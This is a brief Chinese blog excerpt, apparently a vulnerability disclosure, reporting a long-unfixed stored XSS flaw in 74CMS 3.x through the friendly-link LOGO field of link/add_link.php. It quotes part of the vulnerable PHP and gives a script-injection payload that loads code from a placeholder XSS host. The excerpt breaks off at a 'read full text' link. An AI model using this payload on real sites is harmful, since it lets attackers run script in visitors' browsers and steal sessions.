• 骑士人才(74CMS)3.X通杀XSS

    骑士人才(74CMS)3.X通杀XSS
    这个XSS好像是从12年3.1开始就存在的吧,到现在的3.4还是没有修复。 漏洞页面:link/add_link.php 友情链接:LOGO处填写><script src=http://xss地址></script> //将进行16进制编码 add_link.php $setsqlarr['link_name']=trim($_POST['link_name'])?trim($_POST['link_name']):showmsg('您没有填写标题!',1); $setsqlarr['link_url']=trim($_POST...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:3,433次 | 标签: